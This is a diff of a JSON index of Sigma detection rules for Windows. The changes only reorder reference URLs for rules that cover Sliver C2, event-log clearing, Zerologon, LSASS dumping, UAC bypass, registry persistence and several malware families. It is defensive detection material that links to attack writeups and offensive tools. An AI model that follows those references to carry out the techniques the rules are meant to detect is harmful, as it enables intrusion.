- "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/",
 "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231",
+ "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_sliver.yml"
 ],
 "tags": [
@@ -14155,8 +14428,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/deviouspolack/status/832535435960209408",
 "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
+ "https://twitter.com/deviouspolack/status/832535435960209408",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml"
 ],
 "tags": [
@@ -14191,8 +14464,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/deviouspolack/status/832535435960209408",
 "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100",
+ "https://twitter.com/deviouspolack/status/832535435960209408",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml"
 ],
 "tags": [
@@ -14224,8 +14497,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://www.secura.com/blog/zero-logon",
 "https://bi-zone.medium.com/hunting-for-zerologon-f65c61586382",
+ "https://www.secura.com/blog/zero-logon",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/netlogon/win_system_possible_zerologon_exploitation_using_wellknown_tools.yml"
 ],
 "tags": [
@@ -14346,9 +14619,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx",
 "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx",
 "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html",
+ "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml"
 ],
 "tags": [
@@ -14381,9 +14654,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx",
 "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx",
 "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html",
+ "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml"
 ],
 "tags": [
@@ -14416,8 +14689,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "Internal Research",
 "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
+ "Internal Research",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml"
 ],
 "tags": [
@@ -14575,8 +14848,8 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/mattifestation/status/899646620148539397",
 "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/",
+ "https://twitter.com/mattifestation/status/899646620148539397",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/wmi/win_wmi_persistence.yml"
 ],
 "tags": [
@@ -14776,9 +15049,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker",
 "https://nxlog.co/documentation/nxlog-user-guide/applocker.html",
 "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/what-is-applocker",
- "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/applocker/using-event-viewer-with-applocker",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/applocker/win_applocker_file_was_not_allowed_to_run.yml"
 ],
 "tags": [
@@ -14849,11 +15122,11 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1",
+ "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427",
 "https://medium.com/falconforce/falconfriday-detecting-active-directory-data-collection-0xff21-c22d1a57494c",
 "https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/hunting-for-reconnaissance-activities-using-ldap-search-filters/ba-p/824726",
 "https://github.com/BloodHoundAD/SharpHound3/blob/7d96b991b1887ff50349ce59c80980bc0d95c86a/SharpHound3/LdapBuilder.cs",
- "https://github.com/PowerShellMafia/PowerSploit/blob/d943001a7defb5e0d1657085a77a0e78609be58f/Recon/PowerView.ps1",
- "https://github.com/fox-it/BloodHound.py/blob/d65eb614831cd30f26028ccb072f5e77ca287e0b/bloodhound/ad/domain.py#L427",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/ldap/win_ldap_recon.yml"
 ],
 "tags": [
@@ -14902,10 +15175,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
- "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
- "Internal Research",
 "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
+ "Internal Research",
+ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_uncommon_package_locations.yml"
 ],
 "tags": [
@@ -14928,10 +15201,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
- "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
- "Internal Research",
 "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
+ "Internal Research",
+ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_package_locations.yml"
 ],
 "tags": [
@@ -14954,10 +15227,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
- "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
- "Internal Research",
 "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
+ "Internal Research",
+ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_domains.yml"
 ],
 "tags": [
@@ -14980,10 +15253,10 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
- "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
- "Internal Research",
 "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
+ "Internal Research",
+ "https://learn.microsoft.com/en-us/windows/win32/appxpkg/troubleshooting",
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_susp_appx_package_installation.yml"
 ],
 "tags": [
@@ -15030,9 +15303,9 @@
 "logsource.category": "No established category",
 "logsource.product": "windows",
 "refs": [
- "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
 "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
 "https://forensicitguy.github.io/analyzing-magnitude-magniber-appx/",
+ "https://news.sophos.com/en-us/2021/11/11/bazarloader-call-me-back-attack-abuses-windows-10-apps-mechanism/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxdeployment_server/win_appxdeployment_server_mal_appx_names.yml"
 ],
 "tags": [
@@ -15343,8 +15616,8 @@
 "logsource.category": "create_stream_hash",
 "logsource.product": "windows",
 "refs": [
- "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
 "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f",
+ "https://lolbas-project.github.io/lolbas/Binaries/Regedit/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_regedit_export_to_ads.yml"
 ],
 "tags": [
@@ -15401,8 +15674,8 @@
 "logsource.category": "create_stream_hash",
 "logsource.product": "windows",
 "refs": [
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015",
 "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_unusual_extension.yml"
 ],
 "tags": [
@@ -15460,9 +15733,9 @@
 "logsource.category": "create_stream_hash",
 "logsource.product": "windows",
 "refs": [
- "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015",
 "https://fabian-voith.de/2020/06/25/sysmon-v11-1-reads-alternate-data-streams/",
 "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a",
+ "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90015",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_file_sharing_domains_download_susp_extension.yml"
 ],
 "tags": [
@@ -15496,8 +15769,8 @@
 "logsource.category": "create_stream_hash",
 "logsource.product": "windows",
 "refs": [
- "https://labs.withsecure.com/publications/detecting-onenote-abuse",
 "https://github.com/trustedsec/SysmonCommunityGuide/blob/adcdfee20999f422b974c8d4149bf4c361237db7/chapters/file-stream-creation-hash.md",
+ "https://labs.withsecure.com/publications/detecting-onenote-abuse",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/create_stream_hash/create_stream_hash_susp_ip_domains.yml"
 ],
 "tags": [
@@ -15767,9 +16040,9 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/",
 "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf",
 "https://persistence-info.github.io/Data/recyclebin.html",
+ "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml"
 ],
 "tags": [
@@ -15837,8 +16110,8 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md",
 "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml"
 ],
 "tags": [
@@ -15873,10 +16146,10 @@
 "logsource.product": "windows",
 "refs": [
 "https://nvd.nist.gov/vuln/detail/cve-2021-1675",
- "https://www.lexjansen.com/sesug/1993/SESUG93035.pdf",
- "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913",
- "https://nvd.nist.gov/vuln/detail/cve-2021-34527",
 "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760",
+ "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913",
+ "https://www.lexjansen.com/sesug/1993/SESUG93035.pdf",
+ "https://nvd.nist.gov/vuln/detail/cve-2021-34527",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml"
 ],
 "tags": [
@@ -15944,8 +16217,8 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/inversecos/status/1494174785621819397",
 "http://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html",
+ "https://twitter.com/inversecos/status/1494174785621819397",
 "https://outflank.nl/blog/2018/01/16/hunting-for-evil-detect-macros-being-executed/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_trust_record_modification.yml"
 ],
@@ -16252,8 +16525,8 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/",
 "https://github.com/eset/malware-ioc/tree/master/oceanlotus",
+ "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml"
 ],
 "tags": [
@@ -16595,8 +16868,8 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/",
 "https://lolbas-project.github.io/lolbas/Binaries/Atbroker/",
+ "http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_susp_atbroker_change.yml"
 ],
 "tags": [
@@ -16770,10 +17043,10 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/",
 "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]",
- "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass",
 "https://github.com/hfiref0x/UACME",
+ "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass",
+ "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml"
 ],
 "tags": [
@@ -16848,8 +17121,8 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/",
 "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/",
+ "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml"
 ],
 "tags": [
@@ -16882,8 +17155,8 @@
 "logsource.category": "registry_event",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/MalwareJake/status/870349480356454401",
 "https://wikileaks.org/vault7/#Pandemic",
+ "https://twitter.com/MalwareJake/status/870349480356454401",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml"
 ],
 "tags": [
@@ -16916,9 +17189,9 @@
 "logsource.category": "registry_delete",
 "logsource.product": "windows",
 "refs": [
+ "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer",
 "http://woshub.com/how-to-clear-rdp-connections-history/",
 "https://www.trendmicro.com/en_us/research/23/a/vice-society-ransomware-group-targets-manufacturing-companies.html",
- "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml"
 ],
 "tags": [
@@ -17092,11 +17365,11 @@
 "logsource.category": "registry_delete",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md",
+ "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code",
 "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand",
 "https://docs.microsoft.com/en-us/windows/win32/shell/launch",
 "https://github.com/OTRF/detection-hackathon-apt29/issues/7",
- "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.md",
- "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml"
 ],
 "tags": [
@@ -17196,8 +17469,8 @@
 "logsource.category": "registry_add",
 "logsource.product": "windows",
 "refs": [
- "https://persistence-info.github.io/Data/diskcleanuphandler.html",
 "https://www.hexacorn.com/blog/2018/09/02/beyond-good-ol-run-key-part-86/",
+ "https://persistence-info.github.io/Data/diskcleanuphandler.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_disk_cleanup_handler_entry.yml"
 ],
 "tags": [
@@ -17254,11 +17527,11 @@
 "logsource.category": "registry_add",
 "logsource.product": "windows",
 "refs": [
- "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/",
- "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/",
 "https://unit42.paloaltonetworks.com/guloader-installing-netwire-rat/",
- "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line",
 "https://www.fortinet.com/blog/threat-research/new-netwire-rat-variant-spread-by-phishing",
+ "https://blogs.blackberry.com/en/2021/09/threat-thursday-netwire-rat-is-coming-down-the-line",
+ "https://resources.infosecinstitute.com/topic/netwire-malware-what-it-is-how-it-works-and-how-to-prevent-it-malware-spotlight/",
+ "https://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_malware_netwire.yml"
 ],
 "tags": [
@@ -17324,8 +17597,8 @@
 "logsource.category": "registry_add",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c",
 "https://persistence-info.github.io/Data/amsi.html",
+ "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_persistence_amsi_providers.yml"
 ],
 "tags": [
@@ -17415,8 +17688,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html",
 "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83",
+ "https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dns_server_level_plugin_dll.yml"
 ],
 "tags": [
@@ -17458,8 +17731,8 @@
 "logsource.product": "windows",
 "refs": [
 "https://twitter.com/Hexacorn/status/991447379864932352",
- "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml",
 "http://www.hexacorn.com/blog/2018/05/01/wab-exe-as-a-lolbin/",
+ "https://github.com/LOLBAS-Project/LOLBAS/blob/8283d8d91552213ded165fd36deb6cb9534cb443/yml/OSBinaries/Wab.yml",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_wab_dllpath_reg_change.yml"
 ],
 "tags": [
@@ -17592,8 +17865,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://persistence-info.github.io/Data/htmlhelpauthor.html",
 "https://www.hexacorn.com/blog/2018/04/22/beyond-good-ol-run-key-part-76/",
+ "https://persistence-info.github.io/Data/htmlhelpauthor.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_chm.yml"
 ],
 "tags": [
@@ -17673,8 +17946,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/0gtweet/status/1674399582162153472",
 "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/",
+ "https://twitter.com/0gtweet/status/1674399582162153472",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml"
 ],
 "tags": [
@@ -17848,11 +18121,11 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
+ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc960241(v=technet.10)?redirectedfrom=MSDN",
 "https://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6",
- "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html",
 "https://www.trendmicro.com/en_us/research/19/i/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell.html",
 "https://devblogs.microsoft.com/scripting/determine-pending-reboot-statuspowershell-style-part-1/",
- "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc960241(v=technet.10)?redirectedfrom=MSDN",
+ "https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_pendingfilerenameoperations.yml"
 ],
 "tags": [
@@ -17910,9 +18183,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentversion_nt.yml"
 ],
 "tags": [
@@ -17945,13 +18218,13 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03",
- "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
- "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/",
- "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
 "https://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html",
- "https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html",
+ "https://twitter.com/SagieSec/status/1469001618863624194?t=HRf0eA0W1YYzkTSHb-Ky1A&s=03",
+ "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/",
+ "http://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/",
 "https://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services",
+ "https://threathunterplaybook.com/hunts/windows/190407-RegModEnableRDPConnections/notebook.html",
+ "http://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_terminal_server_suspicious.yml"
 ],
 "tags": [
@@ -18018,8 +18291,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/malmoeb/status/1560536653709598721",
 "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/",
+ "https://twitter.com/malmoeb/status/1560536653709598721",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml"
 ],
 "tags": [
@@ -18043,9 +18316,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml"
 ],
 "tags": [
@@ -18086,8 +18359,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://persistence-info.github.io/Data/wer_debugger.html",
 "https://www.hexacorn.com/blog/2019/09/20/beyond-good-ol-run-key-part-116/",
+ "https://persistence-info.github.io/Data/wer_debugger.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hangs_debugger_persistence.yml"
 ],
 "tags": [
@@ -18208,8 +18481,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/",
 "https://redcanary.com/blog/blackbyte-ransomware/?utm_source=twitter&utm_medium=social",
+ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/blackbyte-ransomware-pt-1-in-depth-analysis/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_blackbyte_ransomware.yml"
 ],
 "tags": [
@@ -18326,8 +18599,8 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://vanmieghem.io/stealth-outlook-persistence/",
 "https://twitter.com/_vivami/status/1347925307643355138",
+ "https://vanmieghem.io/stealth-outlook-persistence/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_office_vsto.yml"
 ],
 "tags": [
@@ -18361,10 +18634,10 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
- "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
 "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns",
+ "https://oddvar.moe/2018/03/21/persistence-using-runonceex-hidden-from-autoruns-exe/",
 "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d",
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node.yml"
 ],
 "tags": [
@@ -18607,9 +18880,9 @@
 "logsource.category": "registry_set",
 "logsource.product": "windows",
 "refs": [
- "https://github.com/gtworek/PSBits/tree/master/SIP",
 "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf",
 "https://persistence-info.github.io/Data/codesigning.html",
